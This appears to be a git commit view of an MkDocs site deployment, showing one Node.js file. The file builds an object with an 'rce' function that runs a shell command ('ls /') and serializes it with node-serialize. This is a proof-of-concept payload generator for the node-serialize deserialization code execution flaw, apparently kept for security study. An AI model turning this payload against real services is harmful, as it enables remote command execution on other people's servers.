Deployed 3ca2ece with MkDocs version: 1.6.1

This commit is contained in:
Swk
2026-04-18 15:46:37 +00:00
commit e25bd52141
625 changed files with 1261223 additions and 0 deletions

View File

@@ -0,0 +1,5 @@
var y = {
rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));